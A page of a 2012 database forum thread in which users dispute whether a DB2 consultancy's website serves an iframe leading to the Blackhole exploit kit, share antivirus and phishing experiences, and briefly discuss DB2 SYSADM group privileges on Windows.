DB2 on Windows - Page 3

n_i · #31 (**permalink**) 05-09-12, 17:46

Quote:

Originally Posted by db2topgun

The site is virus-free.

I wouldn't be so sure. Try wget h t t p://www.db2topgun.com (remove extra blanks, obviously) and see by yourself what HTML is being served. The iframe generated by the script on that page tries to launch what is known as Blackhole exploit kit from a known malware site.

I'm attaching the HTML source (renamed as .txt so that you don't launch it by mistake).

[
Moderation Comment:
Attachement removed in response to copyright claim by db2topgun.
]

LD_Bronstein · #32 (**permalink**) 05-09-12, 18:14

..........

n_i · #33 (**permalink**) 05-09-12, 18:37

Arrogance is no substitute for problem determination skills. You probably call it "self-confidence" though. Feel free to ignore the obvious, Mr. whatever-you-real-name is.

LD_Bronstein · #34 (**permalink**) 05-09-12, 20:10

.............

db2girl · #35 (**permalink**) 05-10-12, 06:44

Comrade Bronstein, n_i was just trying to help. Please don't insult him.

mdx34 · #36 (**permalink**) 05-10-12, 10:08

For those who says the site was clean. See attached. Sorry for being too harsh but I am at edge with the company. One more virus I get, I am out the door.

n_i · #37 (**permalink**) 05-10-12, 10:37

Quote:

Originally Posted by LD_Bronstein

I was contracted by the company that owns the subject web site to build content.

Ah, this is a case of pride being hurt, I see now. I wonder how you were able to deliver "a quality product" without being able to understand HTML code that I included in my post specifically to substantiate my finding, but that's between you and your client, or should I say victim.

Good luck in your endeavours.

db2girl · #38 (**permalink**) 05-10-12, 11:25

Quote:

Originally Posted by mdx34

For those who says the site was clean. See attached. Sorry for being too harsh but I am at edge with the company. One more virus I get, I am out the door.

How do you know you got it from visiting this site? I didn't get a virus / virus warning (have Symantec as well)

mdx34 · #39 (**permalink**) 05-10-12, 12:00

Quote:

Originally Posted by db2girl

How do you know you got it from visiting this site? I didn't get a virus / virus warning (have Symantec as well)

Settings of the proxy and Antivirus we have, it will give you a immediate pop-up window with message indicating you received a virus. I was only at the db2forum site looking at your post and clicked on the link you provided when I get the pop-up. I had no other Internet session opened at the time.

papadi · #40 (**permalink**) 05-11-12, 14:02

Quote:

How do you know you got it from visiting this site?

This was the only url i had not previously visited. The day after visiting db2topgun, i logged on to a bank and was asked to fill out an "authorization required" form that asked for all kinds of info no bank would ever ask online. . .

The bank's security/fraud folks told me that this has happened all too often.

This link shows what looks just like what happened to my pc:
A Cave Monster from Hell Wants Your Financial Data « Webroot Threat Blog
As far as i know, this link has no problems. . .<g>

db2girl · #41 (**permalink**) 05-11-12, 14:17

I tried from my home computer (with a different antivirus software) 2 days ago and it was ok (didn't want to try from the one with no antivirus).

papadi · #42 (**permalink**) 05-11-12, 14:26

Just did a search to see if there was anything about the topgun site.This was the info for the first link returned:

DB2 TOP GUN Consulting
Warning: Dangerous Downloads
Call DB2 Top Gun first for any of your DB2 database support needs. We promise to make you glad you did. Call us at 775-285-6767 or email at info@db2topgun.com

db2topgun.com

Kinda spooky when an internet search flags the site. . .

db2girl · #43 (**permalink**) 05-11-12, 14:35

Use google instead of yahoo

Just kidding... You can email the owner of this site if you like.

papadi · #44 (**permalink**) 05-11-12, 15:52

Yup, did that earlier - i'll probably send another with the result from the search.

db2girl · #45 (**permalink**) 06-12-12, 16:12

Quote:

Originally Posted by n_i

Read about extended security on Windows. If it's on, the members of DB2ADMNS have administrative privileges. If not, all local administrators plus whoever is in SYSADM_GROUP.

You will still be able to start and stop the instance even without SYSADM privileges - even POWER USERS may be sufficient to start the DB2 service.

There's another gotcha - after the installation the DB2 service will be logging in as db2admin (or whatever name you provide). If ever db2admin's password expires, the instance won't start. It is common practice to change the DB2 service login to Local System (login ID SYSTEM), which does not require a password.

I set sysadm_group to DB2ADMNS and made two users (my personal id and db2admin) part of this group. Verified that the developers don't have sysadm. But all of them are administrators on this Win server, so they can easily add themselves to this group... not good, they can do enough damage if they want to. Don't think we can do anything about this ...unless they get removed from the administrator group?

Internet Services

Web Development

Digital Marketing

Consumer Tech